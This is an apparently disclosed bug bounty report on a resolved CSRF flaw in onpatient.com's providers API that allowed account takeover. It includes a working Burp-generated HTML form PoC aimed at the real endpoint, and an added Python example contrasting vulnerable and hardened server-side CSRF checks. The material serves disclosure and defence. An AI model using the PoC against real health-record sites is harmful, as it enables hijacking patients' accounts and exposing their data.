[CRITICAL] CSRF leading to account takeover

Disclosed: 2016-06-14 22:54:02 By sysecure To drchrono
Vulnerability Details
Hi, I have found a CSRF issue that allows an attacker to link his email account to the victim's account and hijack the whole account by adding himself to the providers list.

The link: https://onpatient.com/api/v3/providers

    Content-Type: application/json
    Vary: Accept
    Allow: GET, POST, HEAD, OPTIONS
    [ emails of providers ]

Here is the PoC:

    <html>
    <!-- CSRF PoC - generated by Burp Suite Professional -->
    <body>
      <div class="tab-pane active" id="post-object-form">
        <form action="https://onpatient.com/api/v3/providers" method="POST" enctype="multipart/form-data" class="form-horizontal" novalidate="">
          <fieldset>
            <input type="hidden" name="csrfmiddlewaretoken" value="oCSe26NkXpcEJ0X6MQzpZvFVfGY9M5yX">
            <div class="form-group">
              <label class="col-sm-2 control-label "> Patient </label>
              <div class="col-sm-10">
                <select class="form-control" name="patient">
                  <option value="213477">saleh ss</option>
                </select>
              </div>
            </div>
            <div class="form-group ">
              <label class="col-sm-2 control-label "> Name </label>
              <div class="col-sm-10">
                <input name="name" class="form-control" type="text">
              </div>
            </div>
            <div class="form-group ">
              <label class="col-sm-2 control-label "> Specialty </label>
              <div class="col-sm-10">
                <input name="specialty" class="form-control" type="text">
              </div>
            </div>
            <div class="form-group ">
              <label class="col-sm-2 control-label "> Fax </label>
              <div class="col-sm-10">
                <input name="fax" class="form-control" type="text">
              </div>
            </div>
            <div class="form-group ">
              <label class="col-sm-2 control-label "> Email </label>
              <div class="col-sm-10">
                <input name="email" class="form-control" type="email">
              </div>
            </div>
            <div class="form-group ">
              <label class="col-sm-2 control-label "> Phone </label>
              <div class="col-sm-10">
                <input name="phone" class="form-control" type="text">
              </div>
            </div>
            <div class="form-group ">
              <label class="col-sm-2 control-label "> Address </label>
              <div class="col-sm-10">
                <textarea name="address" class="form-control"></textarea>
              </div>
            </div>
            <!-- form.non_field_errors -->
            <div class="form-actions">
              <button class="btn btn-primary" title="Make a POST request on the Provider List resource">POST</button>
            </div>
          </fieldset>
        </form>
      </div>
    </body>
    </html>
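The PoC above works because the endpoint honours a multipart form POST that arrives from another origin carrying the victim's session cookie; the csrfmiddlewaretoken in the form belongs to the attacker's own browsing session, so a token is only a defence if the server compares it against the token bound to the victim's session. The following Python is an editor's added example, not drchrono's, onpatient's or the reporter's code: it models the accepting behaviour beside a hardened check that rejects the cross-site request on three independent grounds. Treating the endpoint as Django-style is an assumption drawn only from the csrfmiddlewaretoken field name; the session store, request shape, origin names and token values are constructed for the example.

```python
"""Server-side CSRF checks for a cookie-authenticated JSON API.

Added editorial example (not drchrono/onpatient code). Requests are plain
dicts so the module runs offline; the session store below is constructed.
"""
import hmac
import secrets
from urllib.parse import urlsplit

ALLOWED_ORIGIN = "https://onpatient.com"  # assumed first-party origin

# Constructed session store: session cookie value -> CSRF token bound to it.
SESSIONS = {
    "victim-session-cookie": "V1ct1mT0k3n",
}


def issue_csrf_token(session_id):
    """Bind a fresh random token to a session (synchronizer-token pattern)."""
    token = secrets.token_urlsafe(32)
    SESSIONS[session_id] = token
    return token


def origin_of(request):
    """Origin header, falling back to the Referer's scheme+host."""
    headers = request["headers"]
    if "Origin" in headers:
        return headers["Origin"]
    ref = headers.get("Referer")
    if ref:
        parts = urlsplit(ref)
        return f"{parts.scheme}://{parts.netloc}"
    return None


def vulnerable_accepts(request):
    """The failure mode in the report: any POST with a valid session cookie is
    honoured, whatever the body encoding, origin or token."""
    return request["method"] == "POST" and request.get("cookie_session") in SESSIONS


def hardened_accepts(request):
    """Return (accepted, reason). Cross-site writes fail every check below."""
    if request["method"] not in ("POST", "PUT", "PATCH", "DELETE"):
        return True, "safe method"
    session = request.get("cookie_session")
    if session not in SESSIONS:
        return False, "unauthenticated"
    # 1. Origin/Referer must be our own site; a forged <form> cannot set either.
    origin = origin_of(request)
    if origin != ALLOWED_ORIGIN:
        return False, f"bad origin {origin!r}"
    # 2. A JSON API should refuse HTML-form encodings: a cross-site <form> can
    #    only produce urlencoded, multipart or text/plain bodies.
    ctype = request["headers"].get("Content-Type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return False, f"unsupported content type {ctype!r}"
    # 3. The token sent must match the token bound to *this* session, so a
    #    token harvested from the attacker's own session is useless.
    sent = request["headers"].get("X-CSRFToken", "")
    if not hmac.compare_digest(sent, SESSIONS[session]):
        return False, "csrf token mismatch"
    return True, "ok"


# Constructed request mirroring the PoC: the victim's cookie rides along, but
# the page was served from the attacker's site and the body is a multipart form
# whose csrfmiddlewaretoken value came from the attacker's own session.
POC_REQUEST = {
    "method": "POST",
    "cookie_session": "victim-session-cookie",
    "headers": {
        "Origin": "https://attacker.example",
        "Content-Type": "multipart/form-data; boundary=----x",
    },
    "form": {
        "csrfmiddlewaretoken": "oCSe26NkXpcEJ0X6MQzpZvFVfGY9M5yX",
        "patient": "213477",
        "email": "attacker@example.com",
    },
}

# Constructed same-site request as the real front end would send it.
LEGIT_REQUEST = {
    "method": "POST",
    "cookie_session": "victim-session-cookie",
    "headers": {
        "Origin": ALLOWED_ORIGIN,
        "Content-Type": "application/json",
        "X-CSRFToken": SESSIONS["victim-session-cookie"],
    },
    "body": {"patient": 213477, "email": "doctor@example.com"},
}
```

Any one of the three checks stops the PoC on its own; keeping all three means a gap in one (a proxy that strips Origin, a content-type sniffing bug, a token leaked by another page) does not reopen the account-takeover path.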
Report Stats
  • Report ID: 141344
  • State: Closed
  • Substate: resolved
  • Upvotes: 7